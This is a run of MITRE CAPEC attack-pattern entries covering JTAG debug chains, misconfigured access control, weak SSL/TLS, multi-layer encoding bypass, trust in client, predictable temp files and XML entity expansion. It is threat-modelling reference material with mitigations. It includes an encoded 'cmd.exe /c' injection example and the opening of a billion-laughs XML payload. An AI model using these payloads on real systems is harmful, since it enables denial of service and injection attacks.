ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	180	Exploiting Incorrectly Configured Access Control Security Levels

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Find and scan debug interface: The adversary must first find and scan a debug interface to determine what they are authorized to use and what devices are chained to that interface.
Techniques
Use a JTAGulator on a JTAG interface to determine the correct pin configuration, baud rate, and number of devices in the chain

Experiment

Connect to debug interface: The adversary next connects a device to the JTAG interface using the properties found in the explore phase so that they can send commands. The adversary sends some test commands to make sure the connection is working.
Techniques
Connect a device such as a BusPirate or UM232H to the JTAG interface and connect using pin layout found from the JTAGulator

Exploit

Move along debug chain: Once the adversary has connected to the main TAP, or JTAG interface, they will move along the TAP chain to see what debug interfaces might be available on that chain.
Techniques
Run a command such as “scan_chain” to see what TAPs are available in the chain.

Prerequisites

Hardware device has an exposed debug interface

Skills Required

[Level: Medium]

Ability to identify physical debug interfaces on a device

[Level: Medium]

Ability to operate devices to scan and connect to an exposed debug interface

Resources Required

A device to scan a TAP or JTAG interface, such as a JTAGulator

A device to communicate on a TAP or JTAG interface, such as a BusPirate

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Integrity	Modify Data
Access Control Authorization	Gain Privileges

Mitigations

Implement: Ensure that debug components are properly chained, and their granularity is maintained at different authorization levels

Perform Post-silicon validation tests at various authorization levels to ensure that debug components are only accessible to authorized users

Example Instances

A System-on-Chip (SoC) might give regular users access to the SoC-level TAP, but does not want to give access to all of the internal TAPs (e.g., Core). If any of the internal TAPs were incorrectly chained to the SoC-level TAP, this would grant regular users access to the internal TAPs and allow them to execute commands there.

Suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented, and the attacker can gain unauthorized access.

Related Weaknesses

CWE-ID	Weakness Name
1296	Incorrect Chaining or Granularity of Debug Components

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-748] Hewlett-Packard Journal. "Overview of the Test Access Port". 1994-12. <https://www.hpl.hp.com/hpjournal/94dec/dec94a7a.pdf>. URL validated: 2023-01-18.

[REF-749] "Finding Faults with the Test Access Port (TAP)". 2017-06-12. <https://flynn.com/2017/06/12/finding-faults-with-the-test-access-port-tap/>. URL validated: 2023-01-18.

[REF-750] "Technical Guide to JTAG". <https://www.xjtag.com/about-jtag/jtag-a-technical-overview/>. URL validated: 2023-01-18.

Content History

Submissions
Submission Date	Submitter	Organization
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

Attack Pattern ID: 180

Abstraction: Standard

View customized information:

Description

Extended Description

Most commonly, attackers would take advantage of controls that provided too little protection for sensitive activities in order to perform actions that should be denied to them. In some circumstances, an attacker may be able to take advantage of overly restrictive access control policies, initiating denial of services (if an application locks because it unexpectedly failed to be granted access) or causing other legitimate actions to fail due to security. The latter class of attacks, however, is usually less severe and easier to detect than attacks based on inadequate security restrictions. This attack pattern differs from CAPEC 1, "Accessing Functionality Not Properly Constrained by ACLs" in that the latter describes attacks where sensitive functionality lacks access controls, where, in this pattern, the access control is present, but incorrectly configured.

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	122	Privilege Abuse
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	58	Restful Privilege Elevation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	679	Exploitation of Improperly Configured or Implemented Memory Protections
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	680	Exploitation of Improperly Controlled Registers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	681	Exploitation of Improperly Controlled Hardware Security Identifiers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	702	Exploiting Incorrect Chaining or Granularity of Hardware Debug Components
PeerOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	663	Exploitation of Transient Instruction Execution
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	17	Using Malicious Files

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Subvert Access Control

Execution Flow

Explore

Survey: The attacker surveys the target application, possibly as a valid and authenticated user.
Techniques
Spider the web site for all available links.
Brute force to guess all function names/action with different privileges.

Experiment

Identify weak points in access control configurations: The attacker probes the access control for functions and data identified in the Explore phase to identify potential weaknesses in how the access controls are configured.

Techniques
The attacker attempts authenticated access to targeted functions and data.
The attacker attempts unauthenticated access to targeted functions and data.
The attacker attempts indirect and side channel access to targeted functions and data.

Exploit

Access the function or data bypassing the access control: The attacker executes the function or accesses the data identified in the Explore phase bypassing the access control.
Techniques
The attacker executes the function or accesses the data not authorized to them.

Prerequisites

The target must apply access controls, but incorrectly configure them. However, not all incorrect configurations can be exploited by an attacker. If the incorrect configuration applies too little security to some functionality, then the attacker may be able to exploit it if the access control would be the only thing preventing an attacker's access and it no longer does so. If the incorrect configuration applies too much security, it must prevent legitimate activity and the attacker must be able to force others to require this activity..

Skills Required

[Level: Low]

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Authorization	Execute Unauthorized Commands
Authorization	Gain Privileges
Access Control Authorization	Bypass Protection Mechanism
Availability	Unreliable Execution

Mitigations

Design: Configure the access control correctly.

Example Instances

For example, an incorrectly configured Web server, may allow unauthorized access to it, thus threaten the security of the Web application.

Related Weaknesses

CWE-ID	Weakness Name
732	Incorrect Permission Assignment for Critical Resource
1190	DMA Device Enabled Too Early in Boot Phase
1191	On-Chip Debug and Test Interface With Improper Access Control
1193	Power-On of Untrusted Execution Core Before Enabling Fabric Access Control
1220	Insufficient Granularity of Access Control
1268	Policy Privileges are not Assigned Consistently Between Control and Data Agents
1280	Access Control Check Implemented After Asset is Accessed
1297	Unprotected Confidential Information on Device is Accessible by OSAT Vendors
1311	Improper Translation of Security Attributes by Fabric Bridge
1315	Improper Setting of Bus Controlling Capability in Fabric End-point
1318	Missing Support for Security Features in On-chip Fabrics or Buses
1320	Improper Protection for Outbound Error Messages and Alert Signals
1321	Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1574.010	Hijack Execution Flow: Services File Permissions Weaknesses

References

[REF-29] Silvio Cesare. "Share Library Call Redirection Via ELF PLT Infection". Issue 56. Phrack Magazine. 2000. <http://phrack.org/issues/56/7.html>.

[REF-30] "OWASP Top 10 2007". OWASP Top 10 2007 A3 – Malicious File Execution. 2007. The Open Web Application Security Project (OWASP). <https://www.owasp.org/www-pdf-archive/OWASP_Top_10_2007.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Attack_Phases
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Attack_Phases
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Attack_Phases
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Attack_Phases
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Execution_Flow, Related_Weaknesses, Skills_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Related_Attack_Patterns, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Weaknesses, Taxonomy_Mappings

CAPEC-217: Exploiting Incorrectly Configured SSL/TLS

Attack Pattern ID: 217

Abstraction: Standard

View customized information:

Description

Extended Description

SSL/TLS communications become vulnerable to this attack when they use outdated versions and insecure ciphers. Currently, all SSL versions are deprecated and TLS versions 1.0 and 1.1 are also deprecated due to being insecure. It is still possible for later versions of TLS to be insecure if they are configured with insecure ciphers such as 3DES or RC4.

Likelihood Of Attack

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	216	Communication Channel Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Determine SSL/TLS Configuration: Determine the SSL/TLS configuration of either the server or client being targeted, preferably both. This is not a hard requirement, as the adversary can simply assume commonly exploitable configuration settings and indiscriminately attempt them.
Techniques
If the target is a webpage, some of the SSL/TLS configuration can be viewed through the browser's security information, such as the key sizes and cipher being used.

Experiment

Intercept Communication: Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. AiTM (adversary in the middle - CAPEC-94).

Techniques
Create a malicious webpage that looks identical to the target webpage, but routes client traffic to the server such that the adversary can observe the traffic and perform an adverary in the middle attack.
If the adversary has access to the network that either the client or server is on, the can attempt to use a packet sniffer to perform an adversary in the middle attack.
Install a packet sniffer through malware directly to a client device that can intercept SSL/TLS traffic and perform an adversary in the middle attack.

Exploit

Capture or Manipulate Sensitive Data: Once the adversary has the ability to intercept the secure communication, they exploit the incorrectly configured SSL to view the encrypted communication. The adversary can choose to just record the secure communication or manipulate the data to achieve a desired effect.
Techniques
Use known exploits for old SSL and TLS versions.
Use known exploits for weak ciphers such as DES and RC4.

Prerequisites

Access to the client/server stream.

Skills Required

[Level: High]

The adversary needs real-time access to network traffic in such a manner that the adversary can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles.

Resources Required

The adversary needs the ability to sniff traffic, and optionally be able to route said traffic to a system where the sniffing of traffic can take place, and act upon the recovered traffic in real time.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Do not use SSL, as all SSL versions have been broken and should not be used. If TLS is not an option for the client or server, consider setting timeouts on SSL sessions to extremely low values to lessen the potential impact.

Only use TLS version 1.2+, as versions 1.0 and 1.1 are insecure.

Configure TLS to use secure algorithms. The current recommendation is to use ECDH, ECDSA, AES256-GCM, and SHA384 for the most security.

Example Instances

Using MITM techniques, an adversary launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the adversary to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur.

Related Weaknesses

CWE-ID	Weakness Name
201	Insertion of Sensitive Information Into Sent Data

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Execution_Flow
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated @Name, Description, Example_Instances, Execution_Flow, Extended_Description, Mitigations, Resources_Required, Skills_Required
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Exploiting Incorrectly Configured SSL Security Levels

2022-02-22 (Version 3.7)	Exploiting Incorrectly Configured SSL

CAPEC-43: Exploiting Multiple Input Interpretation Layers

Attack Pattern ID: 43

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	267	Leverage Alternate Encoding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Determine application/system inputs where bypassing input validation is desired: The attacker first needs to determine all of the application's/system's inputs where input validation is being performed and where they want to bypass it.
Techniques
While using an application/system, the attacker discovers an input where validation is stopping them from performing some malicious or unauthorized actions.

Experiment

Determine which character encodings are accepted by the application/system: The attacker then needs to provide various character encodings to the application/system and determine which ones are accepted. The attacker will need to observe the application's/system's response to the encoded data to determine whether the data was interpreted properly.

Techniques
Determine which escape characters are accepted by the application/system. A common escape character is the backslash character, '\'
Determine whether URL encoding is accepted by the application/system.
Determine whether UTF-8 encoding is accepted by the application/system.
Determine whether UTF-16 encoding is accepted by the application/system.
Determine if any other encodings are accepted by the application/system.

Combine multiple encodings accepted by the application.: The attacker now combines encodings accepted by the application. The attacker may combine different encodings or apply the same encoding multiple times.

Techniques

Combine same encoding multiple times and observe its effects. For example, if special characters are encoded with a leading backslash, then the following encoding may be accepted by the application/system: "\\\.". With two parsing layers, this may get converted to "\." after the first parsing layer, and then, to "." after the second. If the input validation layer is between the two parsing layers, then "\\\.\\\." might pass a test for ".." but still get converted to ".." afterwards. This may enable directory traversal attacks.

Combine multiple encodings and observe the effects. For example, the attacker might encode "." as "\.", and then, encode "\." as "\.", and then, encode that using URL encoding to "%26%2392%3B%26%2346%3B"

Exploit

Leverage ability to bypass input validation: Attacker leverages their ability to bypass input validation to gain unauthorized access to system. There are many attacks possible, and a few examples are mentioned here.
Techniques
Gain access to sensitive files.
Perform command injection.
Perform SQL injection.
Perform XSS attacks.

Prerequisites

User input is used to construct a command to be executed on the target system or as part of the file name.

Multiple parser passes are performed on the data supplied by the user.

Skills Required

[Level: Medium]

Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters.

Indicators

Control characters are being detected by the filters repeatedly.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data

Mitigations

An iterative approach to input validation may be required to ensure that no dangerous characters are present. It may be necessary to implement redundant checking across different input validation layers. Ensure that invalid data is rejected as soon as possible and do not continue to work with it.

Make sure to perform input validation on canonicalized data (i.e. data that is data in its most standard form). This will help avoid tricky encodings getting past the filters.

Example Instances

The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to "double escape" the backslash. In some cases, a quadruple escape is necessary.

Original String: C:\\\\winnt\\\\system32\\\\cmd.exe /c

<parsing layer>

Interim String: C:\\winnt\\system32\\cmd.exe /c

<parsing layer>

Final String: C:\winnt\system32\cmd.exe /c

This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.

[REF-1]

Related Weaknesses

CWE-ID	Weakness Name
179	Incorrect Behavior Order: Early Validation
181	Incorrect Behavior Order: Validate Before Filter
184	Incomplete List of Disallowed Inputs
183	Permissive List of Allowed Inputs
77	Improper Neutralization of Special Elements used in a Command ('Command Injection')
78	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
697	Incorrect Comparison
707	Improper Neutralization

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attacker_Skills_or_Knowledge_Required, Description, Description Summary, References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances, Execution_Flow, Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-22: Exploiting Trust in Client

Attack Pattern ID: 22

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	39	Manipulating Opaque Client-based Data Tokens
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	77	Manipulating User-Controlled Variables
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	202	Create Malicious Client
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	207	Removing Important Client Functionality

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Subvert Access Control

Prerequisites

Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side.

Skills Required

[Level: Medium]

The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars

Resources Required

Ability to communicate synchronously or asynchronously with server

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data

Mitigations

Design: Ensure that client process and/or message is authenticated so that anonymous communications and/or messages are not accepted by the system.

Design: Do not rely on client validation or encoding for security purposes.

Design: Utilize digital signatures to increase authentication assurance.

Design: Utilize two factor authentication to increase authentication assurance.

Implementation: Perform input validation for all remote content.

Example Instances

Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.

Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.

Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.

Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on.

Related Weaknesses

CWE-ID	Weakness Name
290	Authentication Bypass by Spoofing
287	Improper Authentication
20	Improper Input Validation
200	Exposure of Sensitive Information to an Unauthorized Actor
693	Protection Mechanism Failure

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary, Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Description
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Exploiting Trust in Client (aka Make the Client Invisible)

CAPEC-149: Explore for Predictable Temporary File Names

Attack Pattern ID: 149

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	497	File Discovery
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	155	Screen Temporary Files for Sensitive Information

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.

The attacker must be able to see the names of the files the target is creating.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
377	Insecure Temporary File

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Weaknesses

CAPEC-197: Exponential Data Expansion

Attack Pattern ID: 197

Abstraction: Detailed

View customized information:

Description

Alternate Terms

Term: Billion Laughs Attack

Term: XML Bomb

Term: XML Entity Expansion (XEE)

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	230	Serialized Data with Nested Payloads
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	228	DTD Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using subsitituion on the victim's side.
Techniques
Use an automated tool to record all instances of URLs to process requests.
Use a browser to manually explore the website and analyze how the application processes requests.

Experiment

Craft malicious payload: The adversary crafts a malicious message containing nested exponential expansion that completely uses up available server resources. See the "Example Instances" section for details on how to craft this malicious payload.

Exploit

Send the message: Send the malicious crafted message to the target URL.

Prerequisites

This type of attack requires that the target must receive input but either fail to provide an upper limit for entity expansion or provide a limit that is so large that it does not preclude significant resource consumption.

Skills Required

[Level: Low]

Ability to craft nested data expansion messages.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution Resource Consumption

Mitigations

Design: Use libraries and templates that minimize unfiltered input. Use methods that limit entity expansion and throw exceptions on attempted entity expansion.

Implementation: For XML based data - disable altogether the use of inline DTD schemas when parsing XML objects. If a DTD must be used, normalize, filter and use an allowlist and parse with methods and routines that will detect entity expansion from untrusted sources.

Example Instances

The most common example of this type of attack is the "many laughs" attack (sometimes called the 'billion laughs' attack). For example:

<?xml version="1.0"?>
<!DOCTYPE lolz [

<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
